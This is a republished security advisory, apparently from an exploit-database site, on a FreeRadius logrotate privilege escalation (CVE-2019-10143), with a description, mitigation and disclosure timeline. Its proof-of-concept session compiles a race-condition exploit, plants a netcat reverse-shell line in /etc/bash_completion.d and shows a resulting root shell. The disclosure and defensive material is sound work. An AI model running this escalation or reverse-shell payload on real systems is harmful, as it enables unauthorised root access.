0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FreeRadius 3.0.19 Logrotate Privilege Escalation Vulnerability
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
# Privilege Escalation via Logrotate in FreeRadius ## Overview Identifier: AIT-SA-20191112-01 Target: FreeRadius Vendor: FreeRadius Version: all versions including 3.0.19 Fixed in Version: 12.2.3, 12.1.8 and 12.0.8 CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-10143 Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology) ## Summary [FreeRadius is a modular Open-Source RADIUS suite.](https://freeradius.org/) ## Vulnerability Description The ownership of the logdirectory "radacct" belongs to user "radiusd". User "radiusd" can elevate the privileges to "root" because of an unsafe interaction with logrotate. User "radiusd" owns the log directory /var/log/radius/radacct: ``` drwx------. 3 radiusd radiusd 4096 26. Apr 16:01 /var/log/radius/radacct/ ``` Log files rotate once a day(or any other frequency if configured) by logrotate as user root. The configuration does not use the "su" directive: ``` /var/log/radius/radacct/*/detail { monthly rotate 4 nocreate missingok compress } ``` Since logrotate is prone to a race-condition(see https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition) it is possible for user "radiusd" to replace the directory /var/log/radius/radacct/logdir with a symbolic link to any directory(for example /etc/bash_completion.d). logrotate will place the compressed files AS ROOT into /etc/bash_completition.d and set the owner and group to "radiusd.radiusd". An attacker could simply place a reverse-shell into this file. As soon as root logs in, a reverse shell will be executed then. Details of the race-condition in logrotate can be found at: * https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition * https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges * https://github.com/whotwagner/logrotten ## Proof of Concept The following example illustrates how an attacker who already gained a shell as user "radiusd", can elevate his privileges to "root". After downloading and compiling, the exploit gets executed and waits until the next daily run of logrotate. If the rotation of the log file succeeds, a new file that contains the reverse shell payload, will be written into /etc/bash_completition.d/ with owner "radiusd". As soon as root logs in, the reverse shell gets executed and opens a shell on the attackers netcat listener: ``` radiusd@redhat7:~$ git clone https://github.com/whotwagner/logrotten.git /tmp/logrotten Cloning into '/tmp/logrotten'... remote: Enumerating objects: 84, done. remote: Counting objects: 100% (84/84), done. remote: Compressing objects: 100% (58/58), done. remote: Total 84 (delta 35), reused 64 (delta 24), pack-reused 0 Unpacking objects: 100% (84/84), done. radiusd@redhat7:~$ mkdir -p /var/log/radius/radacct/logdir radiusd@redhat7:~$ touch /var/log/radius/radacct/logdir/detail radiusd@redhat7:~$ cd /tmp/logrotten && gcc -o logrotten logrotten.c radiusd@redhat7:/tmp/logrotten$ ./logrotten -c /var/log/radius/radacct/logdir/detail Waiting for rotating /var/log/radius/radacct/logdir/detail... Renamed /var/log/radius/radacct/logdir/detail with /var/log/radius/radacct/logdir/detail2 and created symlink to /etc/bash_completion.d Done! radiusd@redhat7:/tmp/logrotten$ ls -l /etc/bash_completion.d/ total 20 -rw-r--r-- 1 root root 11144 Oct 28 2018 grub -rw-r--r-- 1 radiusd radiusd 33 May 12 18:44 detail.1.gz radiusd@redhat7:/tmp/logrotten$ echo "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash localhost 3333 &); fi" > /etc/bash_completion.d/detail.1.gz radiusd@redhat7:/tmp/logrotten$ nc -nvlp 3333 listening on [any] 3333 ... connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55526 id uid=0(root) gid=0(root) groups=0(root) ``` ## Vulnerable Versions All versions including 3.0.19 ## Tested Versions Name : freeradius Architecture: x86_64 Version: 3.0.13 Release: 9.el7_5 ## Impact An attacker who already achieved a valid shell as user "radiusd" could elevate the privileges to "root". The fact that another exploit is needed to get a shell lowers the severity from high to low. ## Mitigation Add "su radiusd:radiusd" to all log sections in /etc/logrotate.d/radiusd. By keeping SELinux in "Enforcing" mode, the "radiusd" user will be limited in the directories he can write to. ## References: * https://access.redhat.com/security/cve/cve-2019-10143 * https://nvd.nist.gov/vuln/detail/CVE-2019-10143 ## Vendor Contact Timeline * `2019-05-01` Contacting RedHat * `2019-05-07` RedHat opens issue at the vendor bugtracker * `2019-05-23` CVE gets assigned to the issue * `2019-05-24` FreeRadius is skeptical about the "security" impact * `2019-11-12` Public disclosure ## Notes This CVE is disputed because the vendor [stated that there is no known remote code execution in freeradius that allows an attacker to gain a shell as user "radiusd"]( https://freeradius.org/security/). CVE's are not only assigned for vulnerabilities but also for exposures that allow attacker to have a stronger impact after a successful attack. Therefore we believe that it is important to file this issue as a security related bug. ## Advisory URL https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius # 0day.today [2024-11-15] #